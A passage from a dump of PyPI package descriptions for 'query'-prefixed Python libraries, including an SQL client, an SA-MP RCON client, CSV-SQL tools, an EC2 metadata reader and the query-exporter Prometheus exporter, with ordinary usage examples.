10\"r=qc.fetch_by_sql(query)df=pd.DataFrame(r)\u5177\u4f53\u793a\u4f8b\u57ce\u533a\u573a\u666f\u7684\u7b5b\u9009\u5b9a\u4e49\u5355\u5e27\u6307\u6807(\u5404\u79cd\u76ee\u6807\u6570)group by \u5e8f\u5217fetch_by_sql \u5b9e\u73b0\u65b9\u5f0fcte \u8bed\u6cd5:t \u8868\u67e5\u8be2\u5355\u5e27\u7684\u53bb\u91cd\u573a\u666f\u3001\u4e0d\u540c\u7c7b\u578b\u7684\u76ee\u6807\u6570\u6307\u6807\uff0cdataset \u53cabatch \u7ef4\u5ea6\u5229\u7528 t \u8868\u7684dataset, batch_path \u7ef4\u5ea6\u805a\u5408\u6307\u6807code examplequery=\"\"\"WITH t AS (SELECTdataset,batch_path,array_distinct(categories) scenes,cardinality(filter(categories,x -> x IN ('car','van','truck','mini_truck','special_truck','truck','cyclist','bicycle','pedestrian'))) AS target_cnt,cardinality(filter(categories,x -> x IN ('truck','mini_truck','special_truck'))) truck_cnt,cardinality(filter(categories, x -> x IN ('car', 'van'))) carvan_cnt,cardinality(filter(categories, x -> x = 'pedestrian')) pedestrian_cnt,cardinality(filter(categories, x -> x IN ('cyclist', 'bicycle'))) cyclist_cntFROMpcd_label_descWHEREdelivery_date = '20230310'AND any_match(road_condition,x -> x = 'highway_road'))SELECTdataset,batch_path,array_distinct(FLATTEN(ARRAY_AGG(scenes))) scenes,SUM(target_cnt) target_cnt,SUM(carvan_cnt) carvan_cnt,SUM(pedestrian_cnt) pedestrian_cnt,SUM(truck_cnt) truck_cnt,SUM(cyclist_cnt) cyclist_cntFROMtGROUP BY1,2ORDER BYtarget_cnt DESC\"\"\"r=qc.fetch_by_sql(query)df=pd.DataFrame(r)fetch_by_stmt \u5b9e\u73b0\u65b9\u5f0fmytable=tables[\"pcd_label_desc\"]stmt=select(mytable.c.dataset,mytable.c.batch_path,# \u6307\u5b9atable\u805a\u5408\u7684\u7ef4\u5ea6text(\"cardinality(filter(categories, x -> x IN ('car', 'van'))) carvan_cnt\"),# \u5b9a\u4e49\u51fd\u6570\u53d8\u6362\u6307\u6807# ... goon).where(and_(mytable.c.delivery_date==\"20230310\",text(\"any_match(road_condition, x -> x = 'city_road')\")# \u8fc7\u6ee4\u57ce\u533a\u573a\u666f))# \u6307\u6807cte \u8868cte=qc.with_cte(stmt)# \u7ee7\u7eed\u805a\u5408stmt2=select(cte.c.dataset,cte.c.batch_path,text(\"SUM(carvan_cnt) carvan_cnt\")).group_by(cte.c.dataset,cte.c.batch_path)# \u67e5\u8be2\u7ed3\u679cr=qc.fetch_by_stmt(stmt2)df=pd.DataFrame(r)"} +{"package": "query-client-silverbullet-s", "pacakge-description": "GTA SA-MP clientRCON and query client library for PythonA modern Python library for querying and managing SA-MP servers.Supported Python version 2.7, 3.4, 3.5 and 3.6Installationpipinstallsamp-client-esUsageThe library can be easily interfaced using a singleSampClientclass:fromsamp_client.clientimportSampClientwithSampClient(address='localhost',port=7777)asclient:printclient.get_server_info()The library also allows you to run RCON commands as well as queries:fromsamp_client.clientimportSampClientwithSampClient(address='localhost',port=7777,rcon_password='password')asclient:client.rcon_cmdlist()Query and RCON responses are parsed into native Python structures:fromsamp_client.clientimportSampClientwithSampClient(address='localhost',port=7777,rcon_password='password')asclient:info=client.get_server_info()printinfo# ServerInfo(password=True, players=9, max_players=100, hostname='Convoy Trucking', gamemode='Convoy Trucking 3.1.1', language='English')printinfo.gamemode# 'Convoy Trucking 3.1.1'printclient.rcon_get_hostname()# ServerVar(name='hostname', value='Convoy Trucking', read_only=False)printclient.rcon_players()[0].ping# 26ExamplesFolderexample/contains usage example of the libraryRunning testsTo run tests:python-munittestdiscover-v"} +{"package": "query-collections", "pacakge-description": "A set of classes that makes managing JSON objects easier within Python (and more?)Why?When wanting to access an index of a JSON object (or a Python\ndictionary/map), we need to use [\u2018member\u2019] syntax. This is ok for simple\nJSON objects, but let\u2019s say you had a complex object andyou wanted a\ndeeply nested element, such as:dict_instance['member'][0]['items'][0]['id']This is where query collections come in. Right now the supported\nstructures are maps (python dictionaries) and lists. Here is how we can\naccess the members in each:Given a k:v map:{\n \"population\": {\n \"faculty\": [\n {\n \"id\": \"103902\",\n \"name\": \"Cory\",\n \"field\": \"CS\"\n },\n {\n \"id\": \"6789\",\n \"name\": \"Ted\",\n },\n {\n \"id\": \"67874\",\n \"name\": \"Mike\",\n \"field\": \"CS\"\n }\n ],\n \"count\": 3,\n \"access_codes\": [\n 1, 2, 3\n ]\n }\n}This specific instance would be rather difficult to obtain information\nfrom, and would require a lot of generators and other unnecessary bloat\nto achieve a task as simple as \u201cif there are any users who are faculty,\nreturn those with a \u2018field\u2019 specifiedHere is the naive solution with regular builtin Python functionality:json_obj = ...\nif json_obj.get('population').get('faculty') is not None:\n matches = [f_member for f_member in json_obj['population']['faculty'] if 'field' in f_member]\n return matches\nreturn None_Here is how we can perform the same operation with a query_dict:json_obj = query_dict(...)\nmatches = json_obj.query(\"population:faculty:*:field!\")In this example,*denotes \u201cany member of the list faculty\u201d, and!means \u2018return true if field exist`. The wildcard operator, by\ndefault, returns any member who returns a value.SyntaxThe syntax for queries is very easy to understand! To access a nested\nmember of a parent, simply do: parent:child. This can be chained over\nany amount of nesting. Of course this is in itself useful, but with the\naddition of operators, the use case is much, much more clear!Acceptable operators: -*: Wildcard operator. Returns the list of\nelements at the given index. -!: Exists operator. Returns true if\nthe member exists.Combination of rules is also acceptable: - The wildcard by default stops\nerror reporting and returns all matching elements following itself in\nthe query string. For example: .query(\u201d*:id!\u201d) returns all members of\nthe first level where id exists. We can also perform queries by using the\nindex operators and prefixing a question mark.FilteringAs of release 0.0.1.2a8, we can now filter lists to search for children\nthat meet certain filters. This is a simple implementation,\nbut should meet demands for this use case. Storing values inside a string\nwas not an idea I supported (i.e., performing \u201ceq=13\u201d), and as such,\nfilters are added an extension to the query method. You can either pass a\nsingle filter, or multiple (as an array), and filters can be accesed within\nthe query string with the \u2018$\u2019 operator, which follows this syntax: member$filterIndex.\nIf you only have one filter, there is no need to do member$0, you can simply do: member$\nExample:For a problem, we need to filter a list of students to find students with a GPA > 3.0.\nIt is simply done as:results = students.query(\"*:GPA$\", filters.greaterEqual(3.0))\n# returns list of students with GPA > 3.0Multiple queries (to find list of students where GPA > 3.0 and attendance > 90.0:results = students.query(\"*:GPA$0:*:ATTENDANCE_PCT$1\",\n filters.greaterEqual(3.0), # filter at index '$0'\n filters.greaterEqual(90.0) # filter at index '$1'\n)\n # returns list of students with GPA > 3.0 and attendance > 90.0StreamsAs of release 0.0.1a3, the Stream class is now in beta. This is a copy of the\nJava 8 Stream API and nearly all functionality exists. You can create your own\nstream from your own type easily, and query_dict and query_list contain a method\nto create the stream.results = Stream.of(1,2,3,4,5,6,7,8,9,10)\nresults.filter(lambda x: x > 5)\\\n .peek(lambda x: print(x))\n\nOUT:\n 6\n 7\n 8\n 9\n 10Examples:You may find a list of query examples in the /test directory. This\nincludes all current combinations of operators and basic error checking.query_dict and query_listCurrently this is all implemented through classes that inherit the dict\nand list class. The only additional functionality of these classes are\ndot access of dictionary members and a \u2018length\u2019/\u2019len\u2019 property of lists.query_dictMembers of the dictionary can be accessed from the dot operator:>>> obj = query_dict({_\n \"name\": \"Cory\",\n \"stats\": {\n \"coolness\": \"over9000\"\n }\n })\n>>> obj.name\n\"Cory\"\n>>> obj.stats.coolness\n\"over9000\"query len/length>>> mlist = query_list([1,2,3])\n>>> mlist.len\n3\n>>> mlist.length\n3Roadmap:Equality operator for basic comparisonsEquality comparatorLicenseQuery Collections\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 Cory Forward\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "querycolumns", "pacakge-description": "querycolumnSimple extension toPandasthat makes it easier to select columns in (very)wideDataFrames. If you name your columns in a hierarchical fashion with a separator (e.g, as you might get frompd.normalize_json(), it lets you select a column or group of columns easily and with tab completion.Here's a quick demo of what this looks like.>>> import pandas as pd\n >>> from querycolumn import patch_dataframe_with_query_columns\n >>> patch_dataframe_with_query_columns()\n >>> df = pd.DataFrame([{'person.size.height': 3, 'person.size.weight': 4}])\n >>> df.qc.person\n \n >>> df.qc.person.size\n \n >>> df.qc.person.size.weight\n 0 4\n Name: person.size.weight, dtype: int64\n >>> df[df.qc.person.size]\n >>>QueryColumns does its magic by patching aDescriptorinto theDataFrameclass. When you retrieve the attributeqcfrom a frame, `QueryColumns.get()' is invoked; this is when QueryColumns introspects its parent dataframe and returns a magical object with tab completion for segmented column names.Note I wrote QueryColumns after working with Pandas for about a week. I don't know if it encourages elegant use of the library, but I find it useful for my usecase. I'm practically certain that it doesn't extend Pandas as one should (there areexplicitAPIs for that), but I couldn't think of a way to do it without the Descritor protocol."} +{"package": "querycontacts", "pacakge-description": "querycontacts - Query Abuse ContactsInstallationpip install querycontactsStarting with version 2.0.0 support for python 2.7 is dropped. This is related to dnspython 2.0.0 also dropping support.Command line usageusage: querycontacts [-h] [--provider PROVIDER] [--version] ip\n\nQueryContact - Find the Abuse contact for a IP address\n\npositional arguments:\nip query network abuse contacts for a given ip address\n\noptional arguments:\n-h, --help show this help message and exit\n--provider PROVIDER change standard network abuse contacts provider.\n Defaults to abuse-contacts.abusix.zone\n--version show program's version number and exitExamplesShow version:$ querycontacts --version\nquerycontacts 2.0.0Show abuse contact for your IP:$ IP=$(curl ipecho.net/plain)\n$ querycontacts $IP\nabuse@yourisp.example.comTest response for localhost:$ querycontacts 127.0.0.1\nAbusix ContactDB Test pointLibrary usage>>> from querycontacts import ContactFinder\n>>> qf = ContactFinder()\n>>> qf.find('127.0.0.2')\n['root@localhost', 'abuse@localhost']\n\n>>> qf.find('::ffff:7f00:2')\n['root@localhost']"} +{"package": "queryConverterRusab", "pacakge-description": "No description available on PyPI."} +{"package": "query-counter", "pacakge-description": "QueryCounterSQLAlchemy model N+1 debugger.NOTE: This is a debugging tool that is not meant to be deployed in production.AboutThis module will help identify N+1 DB calls made through SQLAlchemy. It takes advantage of the SQLAlchemy event listener fordo_orm_execute.QueryCounter will provide insights into which model DB calls are made multiple times, with optional tracebacks and heuristics to determine where these calls originate.By default, QueryCounter will log results with an optional config to raise an Exception.Installationpipinstallquery-counterUsageUsage: Create QueryCounter with a SQLalchemy session, an optional config, andinitializewhen you would like to start tracking requests:fromquery_counterimportQueryCounterquery_counter=QueryCounter(session=session)query_counter.initialize()Runanalyzeto dig into queries that ran since initialization:query_counter.analyze()This also works as a context manager:withQueryCounter(session=session,config=QueryAnalysisConfig(alert_threshold=0))ascounter:session.query(User).first()counter.analyze()Setting a breakpoint in the analyze function will allow you to inspect\nall of the queries and their stack traces.ConfigurationQueryCounteraccepts an optionalconfigkwarg of typeQueryAnalysisConfig.QueryAnalysisConfigis a dataclass with the following specifications/defaults:# QueryCounter analyze will not log or raise exceptions if the number# of duplicated DB calls is less than the alert_thresholdalert_threshold:int=10# QueryCounter analyze will raise an exception if Trueraise_if_exceeds:bool=False# QueryCounter analyze will info log if no DB calls# exceed the thresholdlog_no_alert:bool=False# QueryCounter will store the stacktrace relevant to the DB calltraceback_enabled:bool=False# QueryInstance will inspect frames and filter the stack down# to codepaths specified in heuristic_pathsheuristics_enabled:bool=False# Requires heuristics_enabled=True - filters stack down to# these codepathsheuristic_paths:list=field(default_factory=list)TODOLintingTestsPipelineLicenseQueryCounter is distributed under the MIT License."} +{"package": "querycsv", "pacakge-description": "querycsv.pyis a Python module and program\nthat executes SQL code against data contained in one or more\ncomma-separated-value (CSV) files. The output of the SQL query will be\ndisplayed on the console by default, but may be saved in a new CSV file."} +{"package": "querycsv-redux", "pacakge-description": "querycsv.pyis a Python module and program\nthat executes SQL code against data contained in one or more\ncomma-separated-value (CSV) files. The output of the SQL query will be\ndisplayed on the console by default, but may be saved in a new CSV file."} +{"package": "query-diet", "pacakge-description": "No description available on PyPI."} +{"package": "query-doc", "pacakge-description": "Query Doc PackageA small package that allows you to break your query in manageable chunks (normally fields), allowing you to focus on building each variable / field independently, with notes / documentation and at the end cam be compiled to a single gigantic query string that otherwise would be impossible to manage or maintainfromquery_docimportQueryDocInstantiateqd=QueryDoc({})ADD FIELDSFIELD A_field=qd.field()_field.name='FieldA'_field.desc='FieldA description'_select=f\"\"\"SELECT \"TABLE_A\".\"FILED_A\" AS \"{_field.name}\"\\n\"\"\"_field.select=_select_field.from_=f\"\"\"FROM \"TABLE_A\"\\n\"\"\"_where=f\"\"\"WHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULLAND \"TABLE_A\".\"DATE_FIELD\" = '{{YYYY-MM-DD}}'\\n\"\"\"_field.where=_whereqd.add_field(_field)FIELD B_field=qd.field()_field.name='FieldB'_field.desc='FieldB description'_select=f\"\"\" , \"TABLE_B\".\"FILED_B\" AS \"{_field.name}\"\\n\"\"\"_join=f\"\"\"LEFT OUTER JOIN (SELECT *FROM \"TABLE_B\") AS \"TABLE_B\" ON (\"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\")\\n\"\"\"_field.select=_select_field.join=_joinqd.add_field(_field)CONCAT FIELD A & B_field=qd.field()_field.name='FieldA+FieldB'_field.desc='FieldA Concat FieldB description'_select=f\"\"\" , (COALESCE(@FieldA, '') || COALESCE(@FieldB, '')) AS \"{_field.name}\"\\n\"\"\"_field.select=_selectqd.add_field(_field)GET QUERY PARTS DICTquery_parts=qd.get_query_parts()print(query_parts){'FieldA': {'name': 'FieldA', 'desc': 'FieldA description', 'select': 'SELECT \"TABLE_A\".\"FILED_A\" AS \"FieldA\"\\n', 'from_': 'FROM \"TABLE_A\"\\n', 'join': None, 'where': 'WHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULL \\n AND \"TABLE_A\".\"DATE_FIELD\" = \\'{YYYY-MM-DD}\\'\\n', 'group_by': None, 'order_by': None, 'having': None, 'window': None, 'extras': None, 'active': True}, 'FieldB': {'name': 'FieldB', 'desc': 'FieldB description', 'select': ' , \"TABLE_B\".\"FILED_B\" AS \"FieldB\"\\n', 'from_': None, 'join': 'LEFT OUTER JOIN (\\n SELECT *\\n FROM \"TABLE_B\"\\n) AS \"TABLE_B\" ON (\\n \"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"\\n AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\"\\n)\\n', 'where': None, 'group_by': None, 'order_by': None, 'having': None, 'window': None, 'extras': None, 'active': True}, 'FieldA+FieldB': {'name': 'FieldA+FieldB', 'desc': 'FieldA Concat FieldB description', 'select': ' , (@FieldA || @FieldB) AS \"FieldA+FieldB\"\\n', 'from_': None, 'join': None, 'where': None, 'group_by': None, 'order_by': None, 'having': None, 'window': None, 'extras': None, 'active': True}}GET QUERY STRING (SQL)sql=qd.get_query_sql(None)print(sql){'name': None, 'desc': None, 'select': 'SELECT \"TABLE_A\".\"FILED_A\" AS \"FieldA\"\\n , \"TABLE_B\".\"FILED_B\" AS \"FieldB\"\\n , ((\"TABLE_A\".\"FILED_A\") || ( \"TABLE_B\".\"FILED_B\")) AS \"FieldA+FieldB\"\\n', 'from_': 'FROM \"TABLE_A\"\\n', 'join': 'LEFT OUTER JOIN (\\n SELECT *\\n FROM \"TABLE_B\"\\n) AS \"TABLE_B\" ON (\\n \"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"\\n AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\"\\n)\\n', 'where': 'WHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULL \\n AND \"TABLE_A\".\"DATE_FIELD\" = \\'{YYYY-MM-DD}\\'\\n', 'group_by': '', 'order_by': '', 'having': '', 'window': '', 'extras': None, 'active': True}\nSELECT \"TABLE_A\".\"FILED_A\" AS \"FieldA\"\n , \"TABLE_B\".\"FILED_B\" AS \"FieldB\"\n , ((\"TABLE_A\".\"FILED_A\") || ( \"TABLE_B\".\"FILED_B\")) AS \"FieldA+FieldB\"\nFROM \"TABLE_A\"\nLEFT OUTER JOIN (\n SELECT *\n FROM \"TABLE_B\"\n) AS \"TABLE_B\" ON (\n \"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"\n AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\"\n)\nWHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULL \n AND \"TABLE_A\".\"DATE_FIELD\" = '{YYYY-MM-DD}'SET DATEimportdatetimedates=[datetime.date(2023,1,31)]sql=qd.set_date(sql,dates)print(sql)SELECT \"TABLE_A\".\"FILED_A\" AS \"FieldA\"\n , \"TABLE_B\".\"FILED_B\" AS \"FieldB\"\n , ((\"TABLE_A\".\"FILED_A\") || ( \"TABLE_B\".\"FILED_B\")) AS \"FieldA+FieldB\"\nFROM \"TABLE_A\"\nLEFT OUTER JOIN (\n SELECT *\n FROM \"TABLE_B\"\n) AS \"TABLE_B\" ON (\n \"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"\n AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\"\n)\nWHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULL \n AND \"TABLE_A\".\"DATE_FIELD\" IN ('2023-01-31')"} +{"package": "query-domain-icp", "pacakge-description": "Python \u83b7\u53d6\u57df\u540d ICP \u5907\u6848\u4fe1\u606f \u81ea\u52a8\u7834\u89e3\u6ed1\u52a8\u9a8c\u8bc1\u7801 \u652f\u6301\u7ffb\u9875\u6570\u636e\u6765\u6e90\u5de5\u4fe1\u90e8\u5907\u6848\u7cfb\u7edfhttps://beian.miit.gov.cn/\u672c\u9879\u76ee\u4ec5\u4f9b\u5b66\u4e60\u4ea4\u6d41\u8bf7\u52ff\u7528\u4e8e\u975e\u6cd5\u7528\u9014"} +{"package": "queryeasy", "pacakge-description": "queryeasyExecute SQL queries on data present in CSV or Excel files. Also allows to generate the query output files.FeaturesQuery the CSV or Excel files using sql queriesProvides the option to store the query output to .xls, .xlsx, .csv formatsFormats the output to fit in the terminalRemoves the spaces from the column headers to ease query processSaves the output file to default dir if no path is specifiedInstallationYou can pip install the package usingpipinstallqueryeasyThe command line utility will be installed as\nqueryeasy to bin on Linux (e.g. /usr/bin); or as\nqueryeasy.exe to Scripts in your Python installation on Windows\n(e.g. C:\\Python3\\Scripts\\tabulate.exe).After installing, check the versionqueryeasy--versionUsagequeryeasy [-h] [-s sheet_name] [-o output_file] [-v] filename sql_queryIt can be used to execute sql queries on csv filequeryeasysample.csv\"select * from sample\"It can be used to execute sql queries on excel filequeryeasysample.xls\"select * from sample\"-sSheet1\nqueryeasysample.xlsx\"select * from sample\"-sSheet3The output of the performed query can be saved to a csv or excel filequeryeasysample.xls\"select * from sample\"-sSheet1-o/path/output.xls\nqueryeasysample.xlsx\"select * from sample\"-sSheet3-o/path/output.xlsx\nqueryeasysample.xlsx\"select * from sample\"-sSheet3-ooutput.xlsx\nqueryeasysample.csv\"select * from sample\"-sSheet3-o/path/output.csv\nqueryeasysample.csv\"select * from sample\"-sSheet3-ooutputArgumentspositional arguments: \n filename Enter the file path/name\n sql_query Enter the SQL query\n\noptional arguments:\n -h, --help show this help message and exit\n -s sheet_name, --sheet sheet_name\n Provide the sheet name for excel file\n -o output_file, --output output_file\n Output file path/name to store results\n -v, --version show program's version number and exitNotesTable names used in the SQL query should match the input CSV/Excel file names,\nwithout the \".csv\" or \".xls\" extensionWhile entering query, replace the spaces in column names with underscore(_)The default output file extension is .csvThe output file supports \".xlsx\", \".xls\", \".csv\" extensions as of nowContributeThe library is in initial stage and requires a lot of work, please feel free to contribute"} +{"package": "query-ec2-metadata", "pacakge-description": "EC2 Instance MetadataThis allows querying EC2 instance metadata.It uses IMDSv2. Session credentials are NOT available using this.InstallationAvailable on Pypi asquery-ec2-metadatapip install query-ec2-metadataCommand line toolsec2-metadataUsage:ec2-metadata KEYThis returns an attribute from the instance metadata.The KEY can be any of the data values fromhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.htmlinstance-identityUsage:instance-identity KEYThis returns an attribute from the instance identity document.The key can be any of the data values fromhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.htmlPython moduleinstance_identity_document() -> Dict[str, str]:This returns the identity document for the instance.instance_identity(key: str) -> str:This returns an attribute from the instance identity document.The key can be any of the data values fromhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.htmlec2_metadata(key: str) -> str:This returns an attribute from the instance metadata.The key can be any of the data values fromhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.htmlDevelopmentmake initto set things upmake pytestto run unit testsmake testto run all testsRemember to bump the version inpyproject.tomlbefore merging."} +{"package": "query-everywhere", "pacakge-description": "Query Everywherequery your data in every RDBMS.Installpipinstallquery-everywhereNoticesYou should install your db driver(likepsycopg2-binary) before use.Examplefromquery_everywhereimportQueryer# Create a Queryer with DSNdsn=\"sqlite:///db.sqlite3\"queryer=Queryer(dsn)# Queryfilters=[(\"name__contains\",\"part of name\"),(\"age__gte\",20),(\"age__lt\",30),(\"address__neq\",\"beijing\"),(\"address__eq\",\"shanghai\"),(\"address__icontains\",\"beijing\"),]order=\"create_time desc\"limit=10offset=0data=queryer.query(\"people\",filters,order,limit,offset)print(data)# It where do# SELECT * FROM \"people\" WHERE name LIKE ? AND age >= ? AND age < ?# AND address != ? AND address = ? AND LOWER(address) LIKE ? ORDER BY ? LIMIT ? OFFSET ?Supported operatorsOperatorCommenteqequal toneqnot equal tonenot equal toltless thangtgreater thanlteless than or equal togtegreater than or equal tostartswithstarts with the given valueendswithends with the given valuecontainscontains the given valueicontainscontains the given value in the case-insensitive wayisnullis null"} +{"package": "query-exporter", "pacakge-description": "Export Prometheus metrics from SQL queriesquery-exporteris aPrometheusexporter which allows collecting metrics\nfrom database queries, at specified time intervals.It usesSQLAlchemyto connect to different database engines, including\nPostgreSQL, MySQL, Oracle and Microsoft SQL Server.Each query can be run on multiple databases, and update multiple metrics.The application is simply run as:query-exporter config.yamlwhere the passed configuration file contains the definitions of the databases\nto connect and queries to perform to update metrics.Configuration file formatA sample configuration file for the application looks like this:databases:db1:dsn:sqlite://connect-sql:-PRAGMA application_id = 123-PRAGMA auto_vacuum = 1labels:region:us1app:app1db2:dsn:sqlite://keep-connected:falselabels:region:us2app:app1metrics:metric1:type:gaugedescription:A sample gaugemetric2:type:summarydescription:A sample summarylabels:[l1,l2]expiration:24hmetric3:type:histogramdescription:A sample histogrambuckets:[10,20,50,100,1000]metric4:type:enumdescription:A sample enumstates:[foo,bar,baz]queries:query1:interval:5databases:[db1]metrics:[metric1]sql:SELECT random() / 1000000000000000 AS metric1query2:interval:20timeout:0.5databases:[db1,db2]metrics:[metric2,metric3]sql:|SELECT abs(random() / 1000000000000000) AS metric2,abs(random() / 10000000000000000) AS metric3,\"value1\" AS l1,\"value2\" AS l2query3:schedule:\"*/5****\"databases:[db2]metrics:[metric4]sql:|SELECT value FROM (SELECT \"foo\" AS metric4 UNIONSELECT \"bar\" AS metric3 UNIONSELECT \"baz\" AS metric4)ORDER BY random()LIMIT 1databasessectionThis section contains definitions for databases to connect to. Key names are\narbitrary and only used to reference databases in thequeriessection.Each database definitions can have the following keys:dsn:database connection details.It can be provided as a string in the following format:dialect[+driver]://[username:password][@host:port]/database[?option=value&...](seeSQLAlchemy documentationfor details on available engines and\noptions), or as key/value pairs:dialect:[+driver]user:password:host:port:database:options:::All entries are optional, exceptdialect.Note that in the string form, username, password and options need to be\nURL-encoded, whereas this is done automatically for the key/value form.Seedatabase-specific optionspage for some extra details on database\nconfiguration options.It\u2019s also possible to get the connection string indirectly from other sources:from an environment variable (e.g.$CONNECTION_STRING) by settingdsnto:env:CONNECTION_STRINGfrom a file, containing only the DSN value, by settingdsnto:file:/path/to/fileThese forms only support specifying the actual DNS in the string form.connect-sql:An optional list of queries to run right after database connection. This can\nbe used to set up connection-wise parameters and configurations.keep-connected:whether to keep the connection open for the database between queries, or\ndisconnect after each one. If not specified, defaults totrue. Setting\nthis option tofalsemight be useful if queries on a database are run\nwith very long interval, to avoid holding idle connections.autocommit:whether to set autocommit for the database connection. If not specified,\ndefaults totrue. This should only be changed tofalseif specific\nqueries require it.labels:an optional mapping of label names and values to tag metrics collected from each database.\nWhen labels are used, all databases must define the same set of labels.metricssectionThis section containsPrometheusmetrics definitions. Keys are used as metric\nnames, and must therefore be valid metric identifiers.Each metric definition can have the following keys:type:the type of the metric, must be specified. The following metric types are\nsupported:counter: value is incremented with each result from queriesenum: value is set with each result from queriesgauge: value is set with each result from querieshistogram: each result from queries is added to observationssummary: each result from queries is added to observationsdescription:an optional description of the metric.labels:an optional list of label names to apply to the metric.If specified, queries updating the metric must return rows that include\nvalues for each label in addition to the metric value. Column names must\nmatch metric and labels names.buckets:forhistogrammetrics, a list of buckets for the metrics.If not specified, default buckets are applied.states:forenummetrics, a list of string values for possible states.Queries for updating the enum must return valid states.expiration:the amount of time after which a series for the metric is cleared if no new\nvalue is collected.Last report times are tracked independently for each set of label values for\nthe metric.This can be useful for metric series that only last for a certain amount of\ntime, to avoid an ever-increasing collection of series.The value is interpreted as seconds if no suffix is specified; valid suffixes\nares,m,h,d. Only integer values are accepted.increment:forcountermetrics, whether to increment the value by the query result,\nor set the value to it.By default, counters are incremented by the value returned by the query. If\nthis is set tofalse, instead, the metric value will be set to the result\nof the query.NOTE: The default will be reversed in the 3.0 release, andincrementwill be set tofalseby default.queriessectionThis section contains definitions for queries to perform. Key names are\narbitrary and only used to identify queries in logs.Each query definition can have the following keys:databases:the list of databases to run the query on.Names must match those defined in thedatabasessection.Metrics are automatically tagged with thedatabaselabel so that\nindependent series are generated for each database that a query is run on.interval:the time interval at which the query is run.The value is interpreted as seconds if no suffix is specified; valid suffixes\nares,m,h,d. Only integer values are accepted.If a value is specified forinterval, aschedulecan\u2019t be specified.If no value is specified (or specified asnull), the query is only\nexecuted upon HTTP requests.metrics:the list of metrics that the query updates.Names must match those defined in themetricssection.parameters:an optional list or dictionary of parameters sets to run the query with.If specified as a list, the query will be run once for every set of\nparameters specified in this list, for every interval.Each parameter set must be a dictionary where keys must match parameters\nnames from the query SQL (e.g.:param).As an example:query:databases:[db]metrics:[metric]sql:|SELECT COUNT(*) AS metric FROM tableWHERE id > :param1 AND id < :param2parameters:-param1:10param2:20-param1:30param2:40If specified as a dictionary, it\u2019s used as a multidimensional matrix of\nparameters lists to run the query with.\nThe query will be run once for each permutation of parameters.If a query is specified with parameters as matrix in itssql, it will be run once\nfor every permutation in matrix of parameters, for every interval.Variable format in sql query::{top_level_key}__{inner_key}query:databases:[db]metrics:[apps_count]sql:|SELECT COUNT(1) AS apps_count FROM apps_listWHERE os = :os__name AND arch = :os__arch AND lang = :lang__nameparameters:os:-name:MacOSarch:arm64-name:Linuxarch:amd64-name:Windowsarch:amd64lang:-name:Python3-name:Java-name:TypeScriptThis example will generate 9 queries with all permutations ofosandlangparameters.schedule:a schedule for executing queries at specific times.This is expressed as a Cron-like format string (e.g.*/5 * * * *to run\nevery five minutes).If a value is specified forschedule, anintervalcan\u2019t be specified.If no value is specified (or specified asnull), the query is only\nexecuted upon HTTP requests.sql:the SQL text of the query.The query must return columns with names that match those of the metrics\ndefined inmetrics, plus those of labels (if any) for all these metrics.query:databases:[db]metrics:[metric1,metric2]sql:SELECT 10.0 AS metric1, 20.0 AS metric2will updatemetric1to10.0andmetric2to20.0.Note:since:is used for parameter markers (seeparametersabove),\nliteral single:at the beginning of a word must be escaped with\nbackslash (e.g.SELECT'\\:bar'FROM table). There\u2019s no need to escape\nwhen the colon occurs inside a word (e.g.SELECT 'foo:bar' FROM table).timeout:a value in seconds after which the query is timed out.If specified, it must be a multiple of 0.1.Metrics endpointThe exporter listens on port9560providing the standard/metricsendpoint.By default, the port is bound onlocalhost. Note that if the name resolves\nboth IPv4 and IPv6 addressses, the exporter will bind on both.For the configuration above, the endpoint would return something like this:# HELP database_errors_total Number of database errors\n# TYPE database_errors_total counter\n# HELP queries_total Number of database queries\n# TYPE queries_total counter\nqueries_total{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\",status=\"success\"} 50.0\nqueries_total{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\",status=\"success\"} 13.0\nqueries_total{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\",status=\"success\"} 13.0\nqueries_total{app=\"app1\",database=\"db2\",query=\"query3\",region=\"us2\",status=\"error\"} 